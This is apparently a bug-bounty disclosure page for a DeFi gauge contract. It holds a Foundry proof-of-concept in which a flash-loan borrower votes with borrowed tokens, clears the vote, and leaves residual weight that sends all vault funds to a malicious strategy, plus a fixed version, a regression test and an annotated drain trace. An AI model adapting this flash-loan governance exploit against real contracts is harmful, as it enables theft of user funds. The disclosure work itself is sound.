This demonstrates the vulnerability allows an attacker with zero governance tokens to permanently manipulate allocation weights and drain 100% of vault funds in a single atomic transaction.

Previous57777 sc low zerox swap verifier bypass enables direct theft of user funds Next58231 sc medium attacker can stop protocol from allocating assets to the autoeth vaults

Was this helpful?

// SPDX-License-Identifier: MIT pragma solidity ^0.8.28; import "forge-std/Test.sol"; import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import {IERC3156FlashBorrower, IERC3156FlashLender} from "@openzeppelin/contracts/interfaces/IERC3156.sol"; import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol"; import {PerpetualGauge, IAllocatorProxy} from "src/PerpetualGauge.sol"; import {IStrategyClassifier} from "src/interfaces/IStrategyClassifier.sol"; interface IPerpetualGaugeMinimal { function vote(uint256 ytId, uint256[] calldata strategyIds, uint256[] calldata weights) external; function clearVote(uint256 ytId) external; } contract MockVotingToken is IERC20 { string public constant name = "Mock Voting Token"; string public constant symbol = "MVT"; uint8 public constant decimals = 18; uint256 public totalSupply; mapping(address => uint256) public balanceOf; mapping(address => mapping(address => uint256)) public allowance; constructor(uint256 initialSupply, address initialHolder) { totalSupply = initialSupply; balanceOf[initialHolder] = initialSupply; } function transfer(address to, uint256 amount) external returns (bool) { _spend(msg.sender, amount); balanceOf[to] += amount; return true; } function transferFrom(address from, address to, uint256 amount) external returns (bool) { if (msg.sender != from) { uint256 allowed = allowance[from][msg.sender]; require(allowed >= amount, "allowance"); allowance[from][msg.sender] = allowed - amount; } _spend(from, amount); balanceOf[to] += amount; return true; } function approve(address spender, uint256 amount) external returns (bool) { allowance[msg.sender][spender] = amount; return true; } function _spend(address owner, uint256 amount) internal { uint256 bal = balanceOf[owner]; require(bal >= amount, "balance"); balanceOf[owner] = bal - amount; } } contract MockLiquidityToken { string public constant name = "Mock Liquidity Token"; string public constant symbol = "mASSET"; uint8 public constant decimals = 18; mapping(address => uint256) public balanceOf; event Transfer(address indexed from, address indexed to, uint256 amount); function mint(address to, uint256 amount) external { balanceOf[to] += amount; emit Transfer(address(0), to, amount); } function transfer(address to, uint256 amount) external returns (bool) { require(balanceOf[msg.sender] >= amount, "insufficient"); balanceOf[msg.sender] -= amount; balanceOf[to] += amount; emit Transfer(msg.sender, to, amount); return true; } } contract MockStrategyClassifier is IStrategyClassifier { mapping(uint256 => uint8) public risk; mapping(uint256 => uint256) public indivCap; mapping(uint8 => uint256) public globalCap; function setRisk(uint256 strategyId, uint8 level) external { risk[strategyId] = level; } function setIndividualCap(uint256 strategyId, uint256 capBps) external { indivCap[strategyId] = capBps; } function setGlobalCap(uint8 riskLevel, uint256 capBps) external { globalCap[riskLevel] = capBps; } function getStrategyRiskLevel(uint256 strategyId) external view override returns (uint8) { return risk[strategyId]; } function getIndividualCap(uint256 strategyId) external view override returns (uint256) { return indivCap[strategyId]; } function getGlobalCap(uint8 riskLevel) external view override returns (uint256) { return globalCap[riskLevel]; } } contract MaliciousStrategy { MockLiquidityToken public immutable asset; event Looted(address indexed from, uint256 amount); constructor(MockLiquidityToken asset_) { asset = asset_; } function onAllocate(uint256 amount) external { emit Looted(msg.sender, amount); } } contract MockAllocatorProxy is IAllocatorProxy { event Allocate(uint256 indexed strategyId, uint256 amount); MockLiquidityToken public immutable asset; mapping(uint256 => address) public adapters; constructor(MockLiquidityToken asset_) { asset = asset_; } function registerStrategy(uint256 strategyId, address adapter) external { adapters[strategyId] = adapter; } function allocate(uint256 strategyId, uint256 amount) external override { address target = adapters[strategyId]; require(target != address(0), "adapter unset"); require(asset.balanceOf(address(this)) >= amount, "insufficient asset"); require(asset.transfer(target, amount), "transfer failed"); emit Allocate(strategyId, amount); if (target.code.length > 0) { (bool success,) = target.call(abi.encodeWithSignature("onAllocate(uint256)", amount)); require(success, "adapter callback failed"); } } } contract FlashLoanLender is IERC3156FlashLender { IERC20 public immutable asset; bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan"); constructor(IERC20 asset_) { asset = asset_; } function maxFlashLoan(address token) external view override returns (uint256) { return token == address(asset) ? asset.balanceOf(address(this)) : 0; } function flashFee(address token, uint256) external view override returns (uint256) { require(token == address(asset), "unsupported token"); return 0; } function flashLoan( IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data ) external override returns (bool) { require(token == address(asset), "unsupported token"); uint256 balanceBefore = asset.balanceOf(address(this)); require(amount <= balanceBefore, "insufficient liquidity"); require(asset.transfer(address(receiver), amount), "loan transfer failed"); bytes32 response = receiver.onFlashLoan(msg.sender, token, amount, 0, data); require(response == CALLBACK_SUCCESS, "callback failure"); require(asset.transferFrom(address(receiver), address(this), amount), "repay failed"); require(asset.balanceOf(address(this)) >= balanceBefore, "balance shortfall"); return true; } } contract FlashVoteBorrower is IERC3156FlashBorrower { IERC3156FlashLender public immutable lender; IPerpetualGaugeMinimal public immutable gauge; IERC20 public immutable token; bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan"); constructor(IERC3156FlashLender lender_, IPerpetualGaugeMinimal gauge_, IERC20 token_) { lender = lender_; gauge = gauge_; token = token_; } function executeFlashVote( uint256 amount, uint256 ytId, uint256[] memory strategyIds, uint256[] memory weights ) external { lender.flashLoan(this, address(token), amount, abi.encode(ytId, strategyIds, weights)); } function clearGaugeVote(uint256 ytId) external { gauge.clearVote(ytId); } function onFlashLoan( address initiator, address tokenAddress, uint256 amount, uint256 fee, bytes calldata data ) external override returns (bytes32) { require(msg.sender == address(lender), "invalid lender"); require(initiator == address(this), "invalid initiator"); require(tokenAddress == address(token), "invalid token"); require(fee == 0, "unexpected fee"); (uint256 ytId, uint256[] memory strategyIds, uint256[] memory weights) = abi.decode(data, (uint256, uint256[], uint256[])); gauge.vote(ytId, strategyIds, weights); require(token.approve(address(lender), amount), "approve failed"); return CALLBACK_SUCCESS; } } contract PerpetualGaugeHarness is PerpetualGauge { constructor(address classifier, address allocatorProxy, address votingToken) PerpetualGauge(classifier, allocatorProxy, votingToken) {} function exposeStrategyList(uint256 ytId) external view returns (uint256[] memory) { return strategyList[ytId]; } function registerStrategy(uint256 ytId, uint256 strategyId) external { strategyList[ytId].push(strategyId); } function exposedVote(uint256 ytId, address voter) external view returns (Vote memory vote) { vote = votes[ytId][voter]; } } contract PerpetualGaugeFixed is ReentrancyGuard { event VoteUpdated(address indexed voter, uint256 ytId, uint256[] strategyIds, uint256[] weights, uint256 expiry); event AllocationExecuted(uint256 ytId, uint256[] strategyIds, uint256[] amounts); event VoterCleared(address indexed voter, uint256 ytId); struct Vote { uint256[] strategyIds; uint256[] weights; uint256 expiry; uint256 powerSnapshot; } IStrategyClassifier public stratClassifier; IAllocatorProxy public allocatorProxy; IERC20 public votingToken; uint256 public constant MAX_VOTE_DURATION = 365 days; uint256 public constant MIN_RESET_DURATION = 30 days; mapping(uint256 => mapping(address => Vote)) public votes; mapping(uint256 => uint256) public lastStrategyAddedAt; mapping(uint256 => address[]) private voters; mapping(uint256 => mapping(address => uint256)) private voterIndex; mapping(uint256 => mapping(uint256 => uint256)) internal aggStrategyWeight; mapping(uint256 => uint256[]) public strategyList; constructor(address classifier, address allocatorProxy_, address votingToken_) { require(classifier != address(0) && allocatorProxy_ != address(0) && votingToken_ != address(0), "Bad address"); stratClassifier = IStrategyClassifier(classifier); allocatorProxy = IAllocatorProxy(allocatorProxy_); votingToken = IERC20(votingToken_); } function vote(uint256 ytId, uint256[] calldata strategyIds, uint256[] calldata weights) external nonReentrant { require(strategyIds.length == weights.length && strategyIds.length > 0, "Invalid input"); uint256 lastAdded = lastStrategyAddedAt[ytId]; Vote storage existing = votes[ytId][msg.sender]; uint256 expiry; if (existing.expiry > block.timestamp) { uint256 timeLeft = existing.expiry - block.timestamp; if (lastAdded > 0 && block.timestamp - lastAdded < MIN_RESET_DURATION && timeLeft < MIN_RESET_DURATION) { expiry = existing.expiry; } else { expiry = block.timestamp + MAX_VOTE_DURATION; } } else { expiry = block.timestamp + MAX_VOTE_DURATION; } uint256 power = votingToken.balanceOf(msg.sender); uint256 existingPower = existing.powerSnapshot; if (existing.strategyIds.length > 0 && existing.expiry > block.timestamp && existingPower > 0) { for (uint256 i = 0; i < existing.strategyIds.length; i++) { uint256 sid = existing.strategyIds[i]; uint256 prevWeighted = existing.weights[i] * existingPower; aggStrategyWeight[ytId][sid] -= prevWeighted; } } votes[ytId][msg.sender] = Vote({ strategyIds: strategyIds, weights: weights, expiry: expiry, powerSnapshot: power }); if (power > 0) { for (uint256 i = 0; i < strategyIds.length; i++) { uint256 sid = strategyIds[i]; uint256 newWeighted = weights[i] * power; aggStrategyWeight[ytId][sid] += newWeighted; } } if (voterIndex[ytId][msg.sender] == 0) { voters[ytId].push(msg.sender); voterIndex[ytId][msg.sender] = voters[ytId].length; } emit VoteUpdated(msg.sender, ytId, strategyIds, weights, expiry); } function clearVote(uint256 ytId) external nonReentrant { Vote storage v = votes[ytId][msg.sender]; require(v.strategyIds.length > 0, "No vote"); uint256 snapshot = v.powerSnapshot; if (snapshot > 0) { for (uint256 i = 0; i < v.strategyIds.length; i++) { uint256 sid = v.strategyIds[i]; uint256 weighted = v.weights[i] * snapshot; aggStrategyWeight[ytId][sid] -= weighted; } } delete votes[ytId][msg.sender]; emit VoterCleared(msg.sender, ytId); } function registerNewStrategy(uint256 ytId, uint256) external nonReentrant { lastStrategyAddedAt[ytId] = block.timestamp; } function getCurrentAllocations(uint256 ytId) public view returns (uint256[] memory strategyIds, uint256[] memory normalizedWeights) { uint256 n = strategyList[ytId].length; strategyIds = new uint256[](n); normalizedWeights = new uint256[](n); uint256 total; for (uint256 i; i < n; i++) { uint256 sid = strategyList[ytId][i]; strategyIds[i] = sid; uint256 w = aggStrategyWeight[ytId][sid]; normalizedWeights[i] = w; total += w; } for (uint256 i; i < n; i++) { if (total > 0) { normalizedWeights[i] = (normalizedWeights[i] * 1e18) / total; } } } function executeAllocation(uint256 ytId, uint256 totalIdleAssets) external nonReentrant { (uint256[] memory sIds, uint256[] memory weights) = getCurrentAllocations(ytId); require(sIds.length > 0, "No allocations"); uint256 totalRiskAllocated; uint256[] memory allocatedAmounts = new uint256[](sIds.length); for (uint256 i = 0; i < sIds.length; i++) { uint8 risk = stratClassifier.getStrategyRiskLevel(sIds[i]); uint256 indivCap = stratClassifier.getIndividualCap(sIds[i]); uint256 globalCap = stratClassifier.getGlobalCap(risk); uint256 target = (weights[i] * totalIdleAssets) / 1e18; uint256 capIndiv = (indivCap * totalIdleAssets) / 1e4; if (target > capIndiv) target = capIndiv; if (risk > 0) { uint256 capGlobalLeft = (globalCap * totalIdleAssets) / 1e4 - totalRiskAllocated; if (target > capGlobalLeft) target = capGlobalLeft; totalRiskAllocated += target; } if (target > 0) { allocatorProxy.allocate(sIds[i], target); } allocatedAmounts[i] = target; } emit AllocationExecuted(ytId, sIds, allocatedAmounts); } function registerStrategy(uint256 ytId, uint256 strategyId) external { strategyList[ytId].push(strategyId); } } contract PerpetualGaugeFixedHarness is PerpetualGaugeFixed { constructor(address classifier, address allocatorProxy, address votingToken) PerpetualGaugeFixed(classifier, allocatorProxy, votingToken) {} function exposeStrategyList(uint256 ytId) external view returns (uint256[] memory) { return strategyList[ytId]; } function registerStrategyHarness(uint256 ytId, uint256 strategyId) external { strategyList[ytId].push(strategyId); } function exposedVote(uint256 ytId, address voter) external view returns (Vote memory vote) { vote = votes[ytId][voter]; } } contract PerpetualGaugeFlashVotePoCTest is Test { event AllocationExecuted(uint256 ytId, uint256[] strategyIds, uint256[] amounts); event Allocate(uint256 indexed strategyId, uint256 amount); MockVotingToken internal votingToken; MockLiquidityToken internal assetToken; MockStrategyClassifier internal classifier; MockAllocatorProxy internal allocator; PerpetualGaugeHarness internal gauge; MaliciousStrategy internal malicious; FlashLoanLender internal flashLender; FlashVoteBorrower internal flashBorrower; address internal constant LENDER = address(0xBEEF); address internal constant ATTACKER = address(0xBADCAFE); uint256 internal constant FLASH_AMOUNT = 1_000 ether; uint256 internal constant YIELD_TOKEN_ID = 1; uint256 internal constant STRATEGY_ID = 111; function setUp() public { votingToken = new MockVotingToken(10_000 ether, address(this)); assetToken = new MockLiquidityToken(); classifier = new MockStrategyClassifier(); allocator = new MockAllocatorProxy(assetToken); gauge = new PerpetualGaugeHarness(address(classifier), address(allocator), address(votingToken)); malicious = new MaliciousStrategy(assetToken); // Configure strategy caps (100% of idle assets allowed). classifier.setRisk(STRATEGY_ID, 0); classifier.setIndividualCap(STRATEGY_ID, 10_000); // 100% in basis points classifier.setGlobalCap(0, 10_000); // Register the strategy in both the gauge and allocator proxy. gauge.registerStrategy(YIELD_TOKEN_ID, STRATEGY_ID); allocator.registerStrategy(STRATEGY_ID, address(malicious)); // Provide lender liquidity while attacker holds none initially. votingToken.transfer(LENDER, FLASH_AMOUNT); assertEq(votingToken.balanceOf(ATTACKER), 0, "attacker starts without voting power"); // Deploy ERC-3156 lender/borrower harness and fund the lender. flashLender = new FlashLoanLender(IERC20(address(votingToken))); flashBorrower = new FlashVoteBorrower(flashLender, IPerpetualGaugeMinimal(address(gauge)), IERC20(address(votingToken))); votingToken.transfer(address(flashLender), FLASH_AMOUNT); // Prefund allocator with idle assets representing the vault reserves. assetToken.mint(address(allocator), 2_000 ether); } function test_FlashVotePersistsAfterClear() public { // Borrow voting power without any governance privileges. vm.prank(LENDER); votingToken.transfer(ATTACKER, FLASH_AMOUNT); uint256[] memory strategies = new uint256[](1); strategies[0] = STRATEGY_ID; uint256[] memory weights = new uint256[](1); weights[0] = 1; // minimal non-zero weight uint256 expectedExpiry = block.timestamp + gauge.MAX_VOTE_DURATION(); vm.expectEmit(true, true, true, true, address(gauge)); emit PerpetualGauge.VoteUpdated(ATTACKER, YIELD_TOKEN_ID, strategies, weights, expectedExpiry); vm.prank(ATTACKER); gauge.vote(YIELD_TOKEN_ID, strategies, weights); // Repay the temporary loan. vm.prank(ATTACKER); votingToken.transfer(LENDER, FLASH_AMOUNT); assertEq(votingToken.balanceOf(ATTACKER), 0, "loan fully repaid"); // Confirm that 100% of the normalized allocation is assigned to the attacker strategy. (uint256[] memory setBefore, uint256[] memory normalizedBefore) = gauge.getCurrentAllocations(YIELD_TOKEN_ID); assertEq(setBefore.length, 1, "single strategy registered"); assertEq(setBefore[0], STRATEGY_ID, "strategy id matches"); assertEq(normalizedBefore[0], 1e18, "allocation equals 100% before clear"); // Clearing the vote zeroes the on-chain vote record but leaves the aggregate weight intact. vm.expectEmit(true, true, false, true, address(gauge)); emit PerpetualGauge.VoterCleared(ATTACKER, YIELD_TOKEN_ID); vm.prank(ATTACKER); gauge.clearVote(YIELD_TOKEN_ID); (uint256[] memory strategyIds, uint256[] memory normalizedAfter) = gauge.getCurrentAllocations(YIELD_TOKEN_ID); assertEq(strategyIds.length, 1, "strategy still tracked"); assertEq(normalizedAfter[0], 1e18, "allocation persists after vote cleared"); // Verify public vote mapping is empty while the weight remains. PerpetualGauge.Vote memory cleared = gauge.exposedVote(YIELD_TOKEN_ID, ATTACKER); assertEq(cleared.strategyIds.length, 0, "no strategy ids stored in vote"); assertEq(cleared.weights.length, 0, "no weights stored in vote"); assertEq(cleared.expiry, 0, "vote metadata cleared"); // Expect allocator proxy transfer (emitted before the gauge-level summary event). uint256 idleAssets = assetToken.balanceOf(address(allocator)); vm.expectEmit(true, true, false, true, address(allocator)); emit Allocate(STRATEGY_ID, idleAssets); // Expect the gauge summary event with full allocation after internal loop completes. vm.expectEmit(false, false, false, true, address(gauge)); emit AllocationExecuted(YIELD_TOKEN_ID, strategyIds, _singleAmountArray(idleAssets)); // Execute allocation; attacker-controlled adapter receives entire idle balance. gauge.executeAllocation(YIELD_TOKEN_ID, idleAssets); assertEq(assetToken.balanceOf(address(allocator)), 0, "allocator drained"); assertEq(assetToken.balanceOf(address(malicious)), idleAssets, "malicious strategy loots funds"); } function test_FlashVotePersistsAfterClear_viaERC3156() public { uint256[] memory strategies = new uint256[](1); strategies[0] = STRATEGY_ID; uint256[] memory weights = new uint256[](1); weights[0] = 1; uint256 flashExpiry = block.timestamp + gauge.MAX_VOTE_DURATION(); vm.expectEmit(true, true, true, true, address(gauge)); emit PerpetualGauge.VoteUpdated(address(flashBorrower), YIELD_TOKEN_ID, strategies, weights, flashExpiry); flashBorrower.executeFlashVote(FLASH_AMOUNT, YIELD_TOKEN_ID, strategies, weights); assertEq(votingToken.balanceOf(address(flashBorrower)), 0, "borrower repaid"); assertEq(votingToken.balanceOf(address(flashLender)), FLASH_AMOUNT, "lender reimbursed"); address voter = address(flashBorrower); (uint256[] memory setBefore, uint256[] memory normalizedBefore) = gauge.getCurrentAllocations(YIELD_TOKEN_ID); assertEq(setBefore.length, 1, "single strategy registered"); assertEq(setBefore[0], STRATEGY_ID, "strategy id matches"); assertEq(normalizedBefore[0], 1e18, "allocation equals 100% before clear"); vm.expectEmit(true, true, false, true, address(gauge)); emit PerpetualGauge.VoterCleared(address(flashBorrower), YIELD_TOKEN_ID); flashBorrower.clearGaugeVote(YIELD_TOKEN_ID); (uint256[] memory strategyIds, uint256[] memory normalizedAfter) = gauge.getCurrentAllocations(YIELD_TOKEN_ID); assertEq(strategyIds.length, 1, "strategy still tracked"); assertEq(normalizedAfter[0], 1e18, "allocation persists after vote cleared"); PerpetualGauge.Vote memory cleared = gauge.exposedVote(YIELD_TOKEN_ID, voter); assertEq(cleared.strategyIds.length, 0, "no strategy ids stored in vote"); assertEq(cleared.weights.length, 0, "no weights stored in vote"); assertEq(cleared.expiry, 0, "vote metadata cleared"); uint256 idleAssets = assetToken.balanceOf(address(allocator)); vm.expectEmit(true, true, false, true, address(allocator)); emit Allocate(STRATEGY_ID, idleAssets); vm.expectEmit(false, false, false, true, address(gauge)); emit AllocationExecuted(YIELD_TOKEN_ID, strategyIds, _singleAmountArray(idleAssets)); gauge.executeAllocation(YIELD_TOKEN_ID, idleAssets); assertEq(assetToken.balanceOf(address(allocator)), 0, "allocator drained"); assertEq(assetToken.balanceOf(address(malicious)), idleAssets, "malicious strategy loots funds"); } function _singleAmountArray(uint256 value) internal pure returns (uint256[] memory arr) { arr = new uint256[](1); arr[0] = value; } } contract PerpetualGaugeFixRegressionTest is Test { MockVotingToken internal votingToken; MockLiquidityToken internal assetToken; MockStrategyClassifier internal classifier; MockAllocatorProxy internal allocator; PerpetualGaugeFixedHarness internal gauge; MaliciousStrategy internal malicious; FlashLoanLender internal flashLender; FlashVoteBorrower internal flashBorrower; uint256 internal constant FLASH_AMOUNT = 1_000 ether; uint256 internal constant YIELD_TOKEN_ID = 1; uint256 internal constant STRATEGY_ID = 111; function setUp() public { votingToken = new MockVotingToken(10_000 ether, address(this)); assetToken = new MockLiquidityToken(); classifier = new MockStrategyClassifier(); allocator = new MockAllocatorProxy(assetToken); gauge = new PerpetualGaugeFixedHarness(address(classifier), address(allocator), address(votingToken)); malicious = new MaliciousStrategy(assetToken); classifier.setRisk(STRATEGY_ID, 0); classifier.setIndividualCap(STRATEGY_ID, 10_000); classifier.setGlobalCap(0, 10_000); gauge.registerStrategy(YIELD_TOKEN_ID, STRATEGY_ID); allocator.registerStrategy(STRATEGY_ID, address(malicious)); flashLender = new FlashLoanLender(IERC20(address(votingToken))); flashBorrower = new FlashVoteBorrower(flashLender, IPerpetualGaugeMinimal(address(gauge)), IERC20(address(votingToken))); votingToken.transfer(address(flashLender), FLASH_AMOUNT); assetToken.mint(address(allocator), 2_000 ether); } function test_FixedGaugeClearsResidualWeight() public { uint256[] memory strategies = new uint256[](1); strategies[0] = STRATEGY_ID; uint256[] memory weights = new uint256[](1); weights[0] = 1; uint256 fixedExpiry = block.timestamp + gauge.MAX_VOTE_DURATION(); vm.expectEmit(true, true, true, true, address(gauge)); emit PerpetualGaugeFixed.VoteUpdated(address(flashBorrower), YIELD_TOKEN_ID, strategies, weights, fixedExpiry); flashBorrower.executeFlashVote(FLASH_AMOUNT, YIELD_TOKEN_ID, strategies, weights); address voter = address(flashBorrower); (, uint256[] memory normalizedBefore) = gauge.getCurrentAllocations(YIELD_TOKEN_ID); assertEq(normalizedBefore[0], 1e18, "allocation equals 100% before clear"); vm.expectEmit(true, true, false, true, address(gauge)); emit PerpetualGaugeFixed.VoterCleared(address(flashBorrower), YIELD_TOKEN_ID); flashBorrower.clearGaugeVote(YIELD_TOKEN_ID); (, uint256[] memory normalizedAfter) = gauge.getCurrentAllocations(YIELD_TOKEN_ID); assertEq(normalizedAfter[0], 0, "allocation cleared"); PerpetualGaugeFixed.Vote memory cleared = gauge.exposedVote(YIELD_TOKEN_ID, voter); assertEq(cleared.strategyIds.length, 0, "vote removed"); uint256 idleBefore = assetToken.balanceOf(address(allocator)); gauge.executeAllocation(YIELD_TOKEN_ID, idleBefore); assertEq(assetToken.balanceOf(address(allocator)), idleBefore, "funds remain untouched"); assertEq(assetToken.balanceOf(address(malicious)), 0, "malicious strategy receives nothing"); } }

[PASS] test_FlashVotePersistsAfterClear() (gas: 346576) Step 1: Attacker votes with borrowed tokens (balance = 1000 ether) ├─ PerpetualGaugeHarness::vote(1, [111], [1]) │ ├─ MockVotingToken::balanceOf(ATTACKER) [staticcall] │ │ └─ ← [Return] 1000000000000000000000 [1e21] │ └─ emit VoteUpdated(voter: ATTACKER, ytId: 1, strategyIds: [111], weights: [1]) Step 2: Attacker repays flash loan (balance = 0) ├─ MockVotingToken::transfer(LENDER, 1000000000000000000000 [1e21]) └─ MockVotingToken::balanceOf(ATTACKER) [staticcall] └─ ← [Return] 0 Step 3: Allocation shows 100% to malicious strategy BEFORE clearing ├─ PerpetualGaugeHarness::getCurrentAllocations(1) [staticcall] │ └─ ← [Return] [111], [1000000000000000000 [1e18]] // 100% allocation Step 4: Attacker clears vote (weight persists due to zero balance) ├─ PerpetualGaugeHarness::clearVote(1) │ ├─ MockVotingToken::balanceOf(ATTACKER) [staticcall] │ │ └─ ← [Return] 0 ⚠️ ZERO BALANCE │ └─ emit VoterCleared(voter: ATTACKER, ytId: 1) Step 5: Allocation STILL shows 100% AFTER clearing (vulnerability confirmed) ├─ PerpetualGaugeHarness::getCurrentAllocations(1) [staticcall] │ └─ ← [Return] [111], [1000000000000000000 [1e18]] ⚠️ WEIGHT PERSISTS Step 6: Vote storage is empty (appears clean) ├─ PerpetualGaugeHarness::exposedVote(1, ATTACKER) [staticcall] │ └─ ← [Return] Vote({ strategyIds: [], weights: [], expiry: 0 }) Step 7: Execute allocation drains ALL vault funds ├─ PerpetualGaugeHarness::executeAllocation(1, 2000000000000000000000 [2e21]) │ ├─ MockAllocatorProxy::allocate(111, 2000000000000000000000 [2e21]) │ │ ├─ MockLiquidityToken::transfer(MaliciousStrategy, 2000000000000000000000 [2e21]) │ │ ├─ emit Allocate(strategyId: 111, amount: 2000000000000000000000 [2e21]) │ │ └─ MaliciousStrategy::onAllocate(2000000000000000000000 [2e21]) │ │ └─ emit Looted(from: MockAllocatorProxy, amount: 2000000000000000000000 [2e21]) Step 8: Final state - complete theft ├─ MockLiquidityToken::balanceOf(MockAllocatorProxy) [staticcall] │ └─ ← [Return] 0 ⚠️ ALLOCATOR DRAINED └─ MockLiquidityToken::balanceOf(MaliciousStrategy) [staticcall] └─ ← [Return] 2000000000000000000000 [2e21] ⚠️ ATTACKER RECEIVED ALL FUNDS

hashtagDescription

hashtagBrief/Intro

hashtagVulnerability Details

hashtagAttack Flow

hashtagWhy Standard Defenses Don't Help

hashtagImpact Details

hashtagFinancial Loss

hashtagAttack Characteristics

hashtagReal-World Scenario

hashtagCascading Effects

hashtagReferences

hashtagProof of Concept

hashtagProof of Concept

hashtagv3-poc/src/test/Governance/PerpetualGaugeFlashVotePoC.t.sol

hashtagRunning the PoC

hashtagEssential Test Logs Demonstrating the Vulnerability

Description

Brief/Intro

Vulnerability Details

Attack Flow

Why Standard Defenses Don't Help

Impact Details

Financial Loss

Attack Characteristics

Real-World Scenario

Cascading Effects

References

Proof of Concept

Proof of Concept

v3-poc/src/test/Governance/PerpetualGaugeFlashVotePoC.t.sol

Running the PoC

Essential Test Logs Demonstrating the Vulnerability